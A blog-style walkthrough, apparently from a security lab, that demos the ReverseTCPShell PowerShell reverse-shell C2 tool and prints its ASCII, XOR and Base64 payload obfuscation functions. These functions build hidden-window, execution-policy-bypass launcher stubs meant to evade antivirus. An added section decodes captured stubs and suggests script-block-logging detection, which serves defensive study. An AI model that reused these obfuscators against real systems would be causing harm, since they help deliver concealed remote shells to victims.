Hi everyone, I'm Mr.赵 from our lab. A few days ago a colleague was already talking about this tool, and as it happens it was released today, so let's take it for a spin. Since Kali already ships PowerShell, I'll demo it directly on Kali.
First, the original author's demo video:
The interface is as bare as it gets, very much in the foreign-developer spirit. ReverseTCPShell C2 is, as the name says, a reverse shell tool written in PowerShell; its traffic is AES-encrypted and it is said to bypass AV. Let's get hands-on.
It offers three ways to obfuscate the payload: ASCII, XOR and Base64. I just picked XOR here.
It prints both a PowerShell and a CMD version of the payload and starts listening on port 4444.
The target checks in, and the WAF does not block it.
Simple command execution:
The usual file upload and download work too, of course.
The implementation is easy to read: three functions, one per mode. Each one builds a small decoder stub with placeholders (@ for the encoded command, # for the key or seed), encodes the command, runs the stub through a Character_Obfuscation helper that is not shown on this page, and then fills in the placeholders.
ASCII
function ASCII_Obfuscation($String)
{
    # Decoder stubs with placeholders: @ is replaced by the byte list below.
    # `$_ keeps $_ literal inside this double-quoted string. The CMD variant
    # uses ```$_ so the echoed text still carries `$_, which the inner IEX
    # (the one that turns the quoted text into a string) strips again.
    $PowerShell = "IEX(-Join((@)|%{[char]`$_}));Exit";
    $CMD = "ECHO `"IEX(-Join((@)|%{[char]```$_}));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
    # The command becomes a comma-separated list of its ASCII codes,
    # e.g. whoami -> 119,104,111,97,109,105.
    $String = [System.Text.Encoding]::ASCII.GetBytes($String) -join ',';
    # Character_Obfuscation is another helper in the tool, not shown on this page.
    # It runs on the stub before the placeholder is filled in, so it must leave @ alone.
    $PowerShell = Character_Obfuscation($PowerShell);
    $PowerShell = $PowerShell -replace "@","$String";
    $CMD = Character_Obfuscation($CMD);
    $CMD = $CMD -replace "@","$String";
    Return $PowerShell,$CMD;
}
XOR
function BXOR_Obfuscation($String)
{
    # Same stubs as the ASCII variant, plus # as the placeholder for the key;
    # each number is XORed with the key before being cast back to a char.
    $PowerShell = "IEX(-Join((@)|%{[char](`$_-BXOR #)}));Exit";
    $CMD = "ECHO `"IEX(-Join((@)|%{[char](```$_-BXOR #)}));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
    # One-byte key written as hex text: '0x' + a digit 0-5 + one hex digit
    # (0-9, A-F, a-f), so 0x00..0x5F. Note that 0x00 is possible and leaves the
    # bytes unchanged. (The + operators were lost when the page was extracted
    # and are restored here.)
    $Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random);
    # PowerShell converts the '0x..' string to an integer for -BXOR.
    $String = ([System.Text.Encoding]::ASCII.GetBytes($String) | % {$_ -BXOR $Key}) -join ',';
    $PowerShell = Character_Obfuscation($PowerShell);   # helper not shown on this page
    $PowerShell = $PowerShell -replace "@","$String";
    $PowerShell = $PowerShell -replace "#","$Key";
    $CMD = Character_Obfuscation($CMD);
    $CMD = $CMD -replace "@","$String";
    $CMD = $CMD -replace "#","$Key";
    Return $PowerShell,$CMD;
}
Base64
function Base64_Obfuscation($String)
{
    # Stub: {@} becomes a script-block literal holding the scrambled Base64 text
    # (GetBytes stringifies it, so the payload needs no quote characters). The
    # stub re-sorts those bytes with the same seeded Get-Random, Base64-decodes
    # the result and IEXes it.
    $PowerShell = "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit";
    $CMD = "ECHO `"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
    # Nine-digit seed, zero-padded so # is always replaced by a fixed-width number.
    $Seed = (Get-Random -Minimum 0 -Maximum 999999999).ToString('000000000');
    # Base64-encode the command, then permute its characters with a Sort-Object
    # keyed on the seeded Get-Random; the stub above does the same on its side.
    $String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($String))) | Sort-Object {Get-Random -SetSeed $Seed}));
    $PowerShell = Character_Obfuscation($PowerShell);   # helper not shown on this page
    $PowerShell = $PowerShell -replace "@","$String";
    $PowerShell = $PowerShell -replace "#","$Seed";
    $CMD = Character_Obfuscation($CMD);
    $CMD = $CMD -replace "@","$String";
    $CMD = $CMD -replace "#","$Seed";
    Return $PowerShell,$CMD;
}
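To make the XOR mode concrete, here is an added example (my own code, not ReverseTCPShell's) that builds the same PowerShell stub and CMD wrapper for a command, leaving out the tool's Character_Obfuscation pass because that helper is not on this page, and then does what a defender would do with a captured stub: pull the byte list and key back out with a regex and recover the command without ever evaluating it. The function names New-XorPayload and ConvertFrom-JoinCharStub, the sample command and the key 0x3A are all my choices; the decoder assumes the plain template and also handles the ASCII mode (key 0), but not the Base64 mode.

```powershell
# Added example (not ReverseTCPShell's own code): the XOR scheme end to end,
# without the tool's Character_Obfuscation pass (not shown on this page), plus the
# inverse that recovers the command from a captured stub without running it.

function New-XorPayload {
    param(
        [Parameter(Mandatory)][string]$Command,
        # One byte, 0x01..0xFF. The tool's own generator ('0x' + digit 0-5 + one
        # hex digit) can produce 0x00, which leaves the bytes unchanged; the lower
        # bound here rules that out.
        [ValidateRange(1, 255)][int]$Key = (Get-Random -Minimum 1 -Maximum 256)
    )
    $HexKey = '0x{0:X2}' -f $Key
    # XOR each ASCII byte of the command, then join into the comma list that the
    # tool splices in for @.
    $Encoded = ([System.Text.Encoding]::ASCII.GetBytes($Command) |
                ForEach-Object { $_ -bxor $Key }) -join ','
    # Decoder stub with the tool's template shape: @ -> byte list, # -> key.
    # Doubled braces are literal braces for the -f operator.
    $Stub = 'IEX(-Join(({0})|%{{[char]($_-BXOR {1})}}));Exit' -f $Encoded, $HexKey
    # CMD wrapper with the tool's shape: echo the quoted stub into a hidden
    # PowerShell whose IEX(IEX($input)) first turns the quoted text into a string
    # and then runs it. $_ is backtick-escaped so the first IEX leaves it intact.
    $Cmd = 'ECHO "' + $Stub.Replace('$_', '`$_') +
           '" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass "IEX(IEX($input))"&Exit'
    [pscustomobject]@{ Key = $HexKey; Encoded = $Encoded; Stub = $Stub; Cmd = $Cmd }
}

function ConvertFrom-JoinCharStub {
    # Defender side: pull the byte list and key out of an ASCII or XOR stub (PS
    # one-liner or CMD wrapper) with a regex and decode them; the payload itself
    # is never evaluated. Assumes the plain template: -match is case-insensitive,
    # so case changes in the stub do not matter, but other rewrites would need
    # their own handling, and the Base64 mode is not covered.
    param([Parameter(Mandatory)][string]$Text)
    $Pattern = '-Join\(\(([\d,]+)\)\|%\{\[char\](?:`?\$_|\(`?\$_-BXOR\s*(0x[0-9A-Fa-f]{1,2}|\d{1,3})\))\}\)\)'
    if ($Text -notmatch $Pattern) { throw 'No ReverseTCPShell-style ASCII/XOR stub found' }
    $Bytes = $Matches[1] -split ',' | ForEach-Object { [int]$_ }
    $Key   = if ($Matches[2]) { [int]$Matches[2] } else { 0 }   # ASCII mode: no key
    -join ($Bytes | ForEach-Object { [char]($_ -bxor $Key) })
}

# Constructed input: a harmless command, round-tripped through both wrappers.
$p = New-XorPayload -Command 'whoami' -Key 0x3A
$p.Stub
$p.Cmd
if ((ConvertFrom-JoinCharStub $p.Stub) -ne 'whoami') { throw 'PS stub round-trip failed' }
if ((ConvertFrom-JoinCharStub $p.Cmd)  -ne 'whoami') { throw 'CMD wrapper round-trip failed' }
# An ASCII-mode stub (no key) decodes with the same function.
$ascii = 'IEX(-Join((119,104,111,97,109,105)|%{[char]$_}));Exit'
if ((ConvertFrom-JoinCharStub $ascii) -ne 'whoami') { throw 'ASCII stub round-trip failed' }
```

Two things worth taking from this. First, a single-byte XOR over a decimal byte list is encoding, not encryption: whoever holds the stub holds the key, so the decoder above recovers the command in one regex match, and whatever "bypass" the tool achieves is only about the literal strings in the stub. Second, all three modes share the `IEX(-Join((…)|%{[char]…}))` shape (or the `Sort-Object {Get-Random -SetSeed …}` shape for Base64), and that template, rather than the encoded bytes, is what to pivot on in PowerShell script block logging.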
Well, that's all for today..